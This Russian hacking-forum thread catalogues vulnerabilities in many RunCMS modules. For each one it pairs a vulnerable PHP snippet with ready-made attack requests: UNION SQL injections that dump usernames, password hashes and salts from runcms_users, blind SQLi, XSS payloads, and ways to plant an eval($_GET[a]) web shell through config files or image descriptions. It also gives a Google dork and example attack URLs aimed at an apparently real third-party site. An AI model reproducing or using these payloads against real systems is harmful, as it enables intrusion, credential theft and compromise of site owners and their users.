ANTICHAT - [ Обзор уязвимостей RunCMS ]

ANTICHAT (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [ Обзор уязвимостей RunCMS ] (https://forum.antichat.xyz/showthread.php?t=59283)

RunCMS Module eBlog 0.1 Blind-SQL

Уязвимый продукт: Module eBlog
Версия: <= 0.1
Линк: http://www.runcms.ru/modules/files/showfile.php?lid=165
Дорк: "inurl:modules/eblog/"

Blind-SQL

Уязвимость в файле index.php.
Уязвимый кусок кода:

PHP код:


		
			
$result = $db->query("select cat_blogid from ".$db->prefix(eblog_cat)." where cat_id=$cat") or $eh->show("0013");

Exploit:

Код:

true: /modules/eblog/index.php?cat=1+and+1=1

false: /modules/eblog/index.php?cat=1+and+1=2

Example:

Код:

true: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=5

false: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=4

Уязвимости модулей RunCMS

XtremGuestbook
Версия: 1.2
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=194

SQL-INJ
Уязвимый скрипт: /modules/xtremuserguestbook/index1.php
Запрос: /modules/xtremuserguestbook/index1.php?gbid=2&op=Messageedit&idmsg=-1+union+select+1,uname,pwdsalt,pass,5,6,7+from+run cms_users
Параметр gbid - айди текушего юзера
Уязвимый кусок кода:
Не знаю, что это за стеб, видимо тут должна была быть проверка на административные права, но получилось вот так ..

PHP код:


		
			
$gbid = intval($HTTP_GET_VARS['gbid']);

if ($gbid != $xoopsUser->uid()) {

    redirect_header(XOOPS_URL."/",3,_NOPERM);

}

PHP код:


		
			
switch($op) {



case "Messageedit":

        Messageedit($HTTP_GET_VARS["idmsg"]);

        break;

PHP код:


		
			
function Messageedit($idmsg) {

global $db, $xoopsModule, $myts, $gbid;



$result=$db->query("SELECT user_id,uname,url,email,title,message,note FROM ".$db->prefix("xtremuserguestbook")." WHERE xtremuserguestbook_id=$idmsg");

Так же можно удалять \ редактировать \ etc сообщения

Активная XSS
Уязвимо поле E-mail
mymail@asdasd.ru'><script>alert()</script><'

Заливка шелла через конфиг
Зависимость: на папку /modules/xtremuserguestbook/cache должны стоять 777 чмоды (я к примеру забыл их поставить))
Уязвимый скрипт: /modules/xtremuserguestbook/conf.php
Запрос: /modules/xtremuserguestbook/conf.php?gbid=2&op=Config
Заюзаем поле _XTUG_NBMSGBYPAGE - 10;eval($_GET[a]);//
и сохраняем настройки, они сохранятся в cache/2.php
где 2 - наш айди
Уязвимый кусок кода:
Так же, как и в случае со скулей, идет не понятная проверка

PHP код:


		
			
$gbid = intval($HTTP_GET_VARS['gbid']);

if ($gbid != $xoopsUser->uid()) {

    redirect_header(XOOPS_URL."/",3,_NOPERM);

}

PHP код:


		
			
function SaveConfig($unbmessage,$uallowbbcode,$uallowhtml,$uallowsmileys,$usendmail2webmaster,$umoderate,$ushowdisclaimer,$ushowlogo) {

global $db, $myts, $HTTP_POST_VARS, $gbid;



$fp=fopen("cache/".$gbid.".php","w");

fwrite($fp,'<?php

$uallowbbcode='.$uallowbbcode.';

$uallowhtml='.$uallowhtml.';

$uallowsmileys='.$uallowsmileys.';

$unbmsgbypage='.$unbmessage.';

$usendmail2webmaster='.$usendmail2webmaster.';

$umoderate='.$umoderate.';

$ushowdisclaimer='.$ushowdisclaimer.';

$ushowlogo='.$ushowlogo.';

?>');

fclose($fp);

    redirect_header("index.php", 1, _UPDATED);

    exit();

}



switch($op) {



case "Config":

        Config();

        break;



case "SaveConfig":

        SaveConfig($nbmessage,$HTTP_POST_VARS["allowbbcode"],$HTTP_POST_VARS["allowhtml"],$HTTP_POST_VARS["allowsmileys"],$HTTP_POST_VARS["sendmail2webmaster"],$HTTP_POST_VARS["moderate"],$HTTP_POST_VARS["showdisclaimer"],$HTTP_POST_VARS["showlogo"]);

        break;

}

"Конфиг" после запроса будет выглядеть примерно вот так:

PHP код:


		
			
<?php

$uallowbbcode=0;

$uallowhtml=0;

$uallowsmileys=0;

$unbmsgbypage=10;eval($_GET[a]);//;

$usendmail2webmaster=0;

$umoderate=0;

$ushowdisclaimer=0;

$ushowlogo=0;

?>

MyAnnonces
Версия: 1.7
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=94

SQL-INJ
Уязвимый скрипт: addannonces.php
Запрос: /modules/MyAnnonces/addannonces.php?op=addindex&cid=-1+union+select+pass,2+from+runcms_users
Вместо pass поочереди подставляем uname,pwdsalt, т.к. concat заюзать не получится - срабатывает мегахаксорная зашита)
Уязвимый кусок кода:
Уязвимость можно проэксплуатировать только, если есть хоть 1 категория.

PHP код:


		
			
switch($op) {    

    case "addindex":

    addindex($cid);

    break;

PHP код:


		
			
function addindex($cid) {

..............

list($numrows) = $db->fetch_row($db->query("select cid, title from ".$db->prefix("ann_categories").""));

    

    if ($numrows>0) {

..............

$requete = $db->query("select title, affprix from ".$db->prefix("ann_categories")." where  cid=".$cid."");

list($title, $affprix) = $db->fetch_row($requete);

SQL-INJ
Уязвимый скрипт: annonces-p-f.php
Зависимость: magic_quotes = off
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=EnvAnn&lid='+union+select+uname,pwdsalt,p ass+from+runcms_users%23
Уязивмый кусок кода:

PHP код:


		
			
switch($op) {



    case "EnvAnn":

    EnvAnn($lid);

    break;

...........

function EnvAnn($lid) {

...........

    $result = $db->query("SELECT lid, title, type FROM ".$db->prefix("ann_annonces")." where lid='$lid'");

    list($lid, $title, $type) = $db->fetch_row($result);

    



    echo "<B><A HREF=\"index.php\">"._CLA_MAIN."</A> &raquo; "._CLA_SENDTO." $lid \"<B>$type : $title</B>\"

Запрос: /modules/MyAnnonces/annonces-p-f.php?op=MailAnn&yname=&ymail=&fname=&fmail=blacksun@xakep.ru&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users
На указанный email придет письмо вида

Код:

Hello ,



 thought that this advert might interest you and wanted to send it to you.



admin :  dd94709528bb1c83d08f3088d4043f4742891f4f

153a



Price : 6 Ђ 7

Email address : http://localhost/runcms/modules/MyAnnonces/contact.php?lid=1

Telephone : 5

Town : 11

Country : 12



Other adverts are available in teh Classified Adverts section of Mysite

http://{SITE URL}/modules/MyAnnonces/

Уязвимый кусок кода:

PHP код:


		
			
switch($op) {

    case "MailAnn":

    MailAnn($lid, $yname, $ymail, $fname, $fmail);

    break;

............

function MailAnn($lid, $yname, $ymail, $fname, $fmail) {

    global $xoopsConfig, $xoopsUser, $db, $monnaie, $ynprice, $myts, $meta;

    

$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");

Можно обойтись и без отсылки на мыло)
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
switch($op) {

    case "ImprAnn":

    ImprAnn($lid);

    break;

..............

function ImprAnn($lid) {

    global $xoopsConfig, $db, $monnaie, $useroffset, $claday, $ynprice, $myts, $meta;

    

    $currenttheme = getTheme();

    

$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");

Флуд именами\паролями\явками своего \ чужого мыла
Уязвимый скрипт: contact.php
Зависимость: magic_quotes = off
Запрос: /modules/MyAnnonces/contact.php?submit=1&id=-1'+union+select+'blacksun@xakep.ru',2,pass,uname,pwdsalt+from+runcms_users%23
Уязвимый кусок кода:

PHP код:


		
			
if ($submit) {

include("header.php");

global $xoopsConfig, $db, $myts, $meta;



 $result = $db->query("SELECT email, submitter, title, type, description FROM  ".$db->prefix("ann_annonces")." WHERE lid = '$id'");

while(list($email, $submitter, $titre, $type, $description) = $db->fetch_row($result)) {

И на этом мне надоело, скриптов в этом модуле еще достаточно и все дырявые .. кто хочет - может добить.

BamaGalerie
Версия: 3.0.1
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=282

Раскрытие путей
/modules/bamagalerie3/makegoback.php?galerieConfig[page_type]=bama_page
/modules/bamagalerie3/navig_cat_show.php
/modules/bamagalerie3/include/copy_one_img.php?galerieConfig[page_type]=bama_page
^ а так же половина скриптов с той же папки (include)

SQL-INJ
Уязвимый скрипт: rateimg.php
Запрос: /modules/bamagalerie3/rateimg.php?id=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
if($HTTP_POST_VARS['submit']) {

.........

} else {

$result=$db->query("select titre from ".$db->prefix("bamagalerie3_img")." where id=$id");

------------------------------------------

MiniGal
Версия: 0.51
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=491

Активная XSS
Добавить коментарий > уязвимо поле name: <script>alert()</script>

Заливка шелла с админки модуля -
Заливаем картинку, затем редактируем Description: <?eval($_GET[a]);?>
Шелл будет в файле mg2db_idatabase.php

Цитата:

RushteR> BlackSun: ты в runcms в модуле myalbum не копался ?

MyAlbum
Версия: 1.0
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=302

SQL-INJ
Уязвимый скрипт: newcomment.php
Запрос: /modules/myalbum/newcomment.php?item_id=-1+union+select+pass+from+runcms_users%23
Уязвимый кусок кода:
Фактически целиком весь файл

PHP код:


		
			
$q = "select l.title from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where l.lid=$item_id and l.lid=t.lid and status>0";

$result=$db->query($q);

list($ltitle)=$db->fetch_row($result);

$subject = $ltitle;

Уязвимый скрипт: photo.php
(Скулю не добил, у меня какие то проблемы с модулем ..)
Запрос: /modules/myalbum/photo.php?lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13%23
Уязвимый кусок кода:

PHP код:


		
			
$q = "select l.lid, l.cid, l.title, l.ext, l.res_x, l.res_y, l.status, l.date, l.hits, l.rating, l.votes, l.comments, t.description from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where l.lid=$lid and l.lid=t.lid and status>0";

$result=$db->query($q);

list($lid, $cid, $ltitle, $ext, $res_x, $res_y, $status, $time, $hits, $rating, $votes, $comments, $description)=$db->fetch_row($result);

Уязвимый скрипт: ratephoto.php
Запрос: /modules/myalbum/ratephoto.php?lid=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
if($HTTP_POST_VARS['submit']) {

...............

} else {

..............

            $result=$db->query("select title from ".$db->prefix("myalbum_photos")." where lid=$lid");

        list($title) = $db->fetch_row($result);

Еще одна не добитая скуля, видимо из за корявой установки модуля ..
Уязвимый скрипт: viewcat.php
Запрос: /modules/myalbum/viewcat.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23
Уязвимый кусок кода:

PHP код:


		
			
$fullcountresult=$db->query("select count(*) from ".$db->prefix("myalbum_photos")." where cid=$cid and status>0");

list($numrows) = $db->fetch_row($fullcountresult);



if($numrows>0){

        $q = "select l.lid, l.title, l.ext, l.res_x, l.res_y, l.status, l.date, l.hits, l.rating, l.votes, l.comments, t.description from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where cid=$cid and l.lid=t.lid and status>0 order by $orderby";

        $result=$db->query($q,$show,$min);

eBlog
Версия: 0.3

Заходим, создаем свой блог, добавляем запись ..

Уязвимый скрипт: blogentry.php
Запрос: blogentry.php?op=edit&text_id=-1+union+select+1,pass,pwdsalt,4+from+runcms_users+limit+0,1
Где выделенная еденица - айди вашего блога
Уязвимый кусок кода:

PHP код:


		
			
    if ($op == 'edit')

    {

        list($b_id, $title, $txt, $dt) = $db->fetch_row($db->query("select text_blogid, text_title, text_text, text_date from ".

                                                                   $db->prefix("eblog_text")." where text_id=$text_id"));

        if (!isSet($b_id) || $b_id != $blog_id)

        {

            echo $blog_id;

            return;

        }

        if (!isSet($cats))

        {

            $result = $db->query("select tc_catid from ".$db->prefix("eblog_text_cat")." where tc_textid=$text_id");

            $cats = array();

            while ($myrow = $db->fetch_array($result)) { $cats += array($myrow['tc_catid']); }

        }

        eBlogMenu(array("index.php?blog_id=1"   => _EBLOG_MY_BLOG,

                        "blogentry.php?op=add"  => _EBLOG_ADD_ENTRY,

                        "blogadmin.php?op=edit" => _EBLOG_ADMIN,

                        "index.php?blog_id=-1"  => _EBLOG_CHOOSE_BLOG,

                        "index.php"             => _EBLOG_ALL_LATEST

                       )

                     );

        showForm(_EBLOG_EDIT_ENTRY, $title, $txt, $all_cats, $cats, $text_id, "");

        return;

    }

Активная XSS
Уязвимо поле имя блога

Event Calendar
Версия: 2.4

Уязвимый скрипт: display.php
Запрос: /modules/ecal/display.php?year1=&month1=&day1=&katid=-1+union+select+pass,2+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
if ($katid) {

    $abfrage =" stamp >= \"$year1-$month1-$day1 00:00:00\" AND cid=$katid AND valid ='yes'";

    $kat1 = $db->query("SELECT title, cid FROM ".$db->prefix("ecal_cat")." where cid=$katid");

    list($kattitle) = $db->fetch_row($kat1);

Уязвимый скрипт: localleve.php
Запрос: /modules/ecal/localleve.php?lid=-1+union+select+pass+from+runcms_users%23
Уязвимый кусок кода:

PHP код:


		
			
$kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");

    list($loctitle) = $db->fetch_row($kat1);

Уязвимый скрипт: location.php
Запрос: /modules/ecal/location.php?lid=-1+union+select+1,2,3,uname,5,pass,pwdsalt,8,9,10,1 1+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
$lid = $HTTP_GET_VARS['lid'];

$locat = $db->query("SELECT * FROM ".$db->prefix("ecal_location")." where lid=".$lid);

$location = $db->fetch_array($locat);

Уязвимый скрипт: modifevent.php
Зависимость: magic_quotes = off
Запрос: /modules/ecal/modifevent.php?id=-1'+union+select+1,2,uname,4,5,6,pass,pwdsalt,9,10, 11,12,13,14+from+runcms_users%23
Уязвимый кусок кода:

PHP код:


		
			
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = '$id' AND valid='yes'");

$row = $db->fetch_array($query);

Уязвимый скрипт: remind.php
Запрос: /modules/ecal/remind.php?op=remindadd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
$tid   = $HTTP_GET_VARS['id'];

.......

$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = $tid");

$row = $db->fetch_array($query);

Уязвимый скрипт: teilnehmen.php
Запрос: /modules/ecal/teilnehmen.php?op=teiladd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
$tid   = $HTTP_GET_VARS['id'];

.......

$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = $tid");

$row = $db->fetch_array($query);

Friendfinder
Версия: 3.02

Уязвимый скрипт: search.php
Запрос: /modules/friendfinder/search.php?page=search&search=search&agefrom=77&ag etill=19+union+select+1,uname,pwdsalt,4,0x31322e31 322e31393939,pass+from+runcms_users%23&sex=&partne r=&state=&category=&sort=
Уязвимый кусок кода:

PHP код:


		
			
if ($page == search) {



if ($search == search) {



/************************/

$g="SUBSTRING(birth,7)";

$m="SUBSTRING(birth,4,2)";

$d="LEFT(birth,2)";

$dat="CONCAT($g,'.',$m,'.',$d)";

/************************/









$sql = "SELECT id,user, city, state, birth, title FROM ".$db->prefix("friendfinder")."

 inner join ".$db->prefix("friendfinder_state")."

 on state = cid

 WHERE (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW())-TO_DAYS($dat)), '%Y')+0) BETWEEN $agefrom AND $agetill AND partner='$sex' AND sex='$partner' AND state='$state' AND active='1' AND category='$category' ORDER BY '$sort'";

} else {

echo ""._TEXTSEARCHUNSUCCESSFUL."";

}



echo "<table border=0 cellpadding=5 cellspacing=0 align=center width=550><tr><td><font face=arial size=2>"._UNAME."</td><br><td><font face=arial size=2>"._TEXTREGION."</td><td><font face=arial size=2>"._CITY."</td><td><font face=arial size=2>"._TEXTAGE."</td></tr>";

$result = $db->query($sql);

        while (list($id,$user,$city,$state,$birth,$title ) = $db->fetch_row($result))

{

Уязвимый скрипт: view.php
Зависимость: magic_quotes = off
Запрос: /modules/friendfinder/view.php?id=-1'+union+select+1,uname,3,4,5,pass,7,8,9,pwdsalt,1 1,12,13,14,0x31322e31322e31393939,16,17,19,20,21,2 2+from+runcms_users%23
Уязвимый кусок кода:

PHP код:


		
			
if (isset($id) || $id != "")

{

$view = $db->query("SELECT id,user,active,sex,category,name,email,city,state,country,hobby,partner,height,weight,birth,pic,Description,imgname,imgtime,date, title FROM ".$db->prefix("friendfinder")."

inner join ".$db->prefix("friendfinder_state")." on state = cid WHERE id = '$id'");

        while (list($id,$user,$active,$sex,$category,$name,$email,$city,$state,$country,$hobby,$partner,$height,$weight,$birth,$pic,$Description,$imgname,$imgtime,$date,$title ) = $db->fetch_row($view)) {

googlestats
Версия: 2

Уязвимый скрипт: info-robot.php
Запрос: /modules/googlestats/info-robot.php?robot=-1+union+select+1,2,pass,pwdsalt,5,uname,7,8,9,10+f rom+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
$descr = "descr_".$LANGUE;

$sql  = "SELECT *";

$sql .= " FROM ".$TABLE_ROBOTS;

$sql .= " WHERE id=".$robot;

$res  = mysql_query($sql) or erreurServeurMySQL($sql);

if ($enr  = mysql_fetch_array($res))

Уязвимый скрипт: index.php
Запрос: /modules/googlestats/index.php?rub=&robot=-1+union+select+pass+from+runcms_users%23&s=06&d=20 090202
Уязвимый кусок кода:

PHP код:


		
			
// index.php

if ( (getVar('rub') == 'bilan') || ($rub == '') )

{

  bilan();

}



// ---------------------------------------------------------------------------

// rubrique PAGES

// ---------------------------------------------------------------------------

else if (getVar('rub') == 'pages')

{

  pages();

}

............

// lib.php

  // contenu

  afficherPages($robot);

...........

// function afficherPages()

  $sql  = "SELECT url, max(date) AS 'lastdate', count(id) AS 'occurrence', ip, dns";

  $sql .= " FROM ".$db->prefix("gs_log");

  $sql .= " WHERE ".$sql_date;

  $sql .= "   AND robot=".$robot;

  $sql .= " GROUP BY url";

  $sql .= " ORDER BY ".$tri;

  $res  = mysql_query($sql) or erreurServeurMySQL($sql);

  if (mysql_num_rows($res) == 0)

HotNews
Версия: 2

Уязвимый скрипт: rate.php
Запрос: /modules/HotNews/rate.php?tid=-1+union+select+1,pass+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
if($HTTP_POST_VARS['submit']) {

........

} else {

        include(XOOPS_ROOT_PATH."/header.php");

    OpenTable();

    $result=$db->query("SELECT cid, tname FROM ".$db->prefix("HotNews")." WHERE tid=$tid");

        list($cid, $tname) = $db->fetch_row($result);

Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=viewexttutorial&tid=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
switch($op) {



            case "viewexttutorial":

                    viewexttutorial();

                    break;

...........

function viewexttutorial() {

        global $db, $xoopsTheme, $HTTP_GET_VARS, $framebrowse;

        include(XOOPS_ROOT_PATH."/header.php");

        $tid = $HTTP_GET_VARS['tid'];

           $db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");

    OpenTable();

        $result = $db->query("select tlink from ".$db->prefix("HotNews")." where tid=$tid ");

    list($tlink) = $db->fetch_row($result);

Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=viewtutorial&tid=-1+union+select+1,2,uname,4,pass,6,7,8,9+from+runcm s_users
Уязвимый кусок кода:

PHP код:


		
			
               case "viewtutorial":

                    viewtutorial();

                    break;

...........

function viewtutorial() {

        global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $HTTP_GET_VARS, $myts, $content_visdefault, $content_default, $content_visualize, $imgwidth, $imgheight, $framebrowse;

        include(XOOPS_ROOT_PATH."/header.php");



        $tid = $HTTP_GET_VARS['tid'];

        if ($HTTP_GET_VARS['page']) {

                $page = $HTTP_GET_VARS['page'];

        } else {

            $db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");

        }

    OpenTable();

        $result = $db->query("select tid, cid, tname, timg, tcont, tauthor, codes, hits, submitter from ".$db->prefix("HotNews")." where tid=$tid ");

    list($tid, $cid, $tname, $timg, $tcont, $tauthor, $codes, $hits, $submitter) = $db->fetch_row($result);

Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=listHotNews&cid=-1+union+select+1,pass,3+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
            case "listHotNews":

                    listHotNews();

                    break;

........

function listHotNews() {

        global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $myts, $category_visdefault, $category_visualize, $category_default, $columnset, $imgwidth, $imgheight;

        global $tutorial_visdefault, $tutorial_visualize, $tutorial_default, $HTTP_GET_VARS, $framebrowse;

        include(XOOPS_ROOT_PATH."/header.php");

        $cid = $HTTP_GET_VARS['cid'];

        $xcid = $cid;

    OpenTable();

        $result = $db->query("select scid, cname, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");

        list($scid, $cname, $cimg) = $db->fetch_row($result);

Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=printpage&tid=-1+union+select+1,2,pass,4+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
            case "printpage":

                    PrintTutPage();

                    break;

..........

function PrintTutPage() {

           global $xoopsConfig, $xoopsUser, $db, $myts, $HTTP_GET_VARS, $imgwidth, $imgheight;

           $tid = $HTTP_GET_VARS['tid'];

        $result=$db->query("select tname, timg, tcont, codes from ".$db->prefix("HotNews")." where tid=$tid");

    list($tname, $timg, $tcont, $codes) = $db->fetch_row($result);

Уязвимый скрипт: submit.php
Запрос: /modules/HotNews/submit.php?op=addTutorial&cid=-1+union+select+1,uname,pass,4+from+runcms_users
Уязвимый кусок кода:

PHP код:


		
			
                case "addTutorial":

                        addTutorial();

                        break;

.........

function addTutorial(){

        global $db, $xoopsConfig, $xoopsUser, $HTTP_GET_VARS, $myts, $xoopsTheme;

        include(XOOPS_ROOT_PATH."/header.php");



    $cid = $HTTP_GET_VARS["cid"];

    $createdir = $HTTP_GET_VARS["createdir"];

        // Add new Tutorial ------------------//

        $result=$db->query("select scid, cname, cdesc, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");

        list($scid,$cname,$cdesc,$cimg) = $db->fetch_row($result);

Заливка шелла
Уязвимый скрипт: upload.php
Скрипт не проверяет типа файла \ расширение поэтому возможно можно залить шелл в папку images, либо в любую другую, передав соотвествующий путь в переменной img_path
( Хотя у меня на локале не заливались даже картинки, поэтому проверить не смог .. впрочем, если расширение и проверяется, то можно залить шелл с раширением .jpg, но img_path=/shell.php%00 )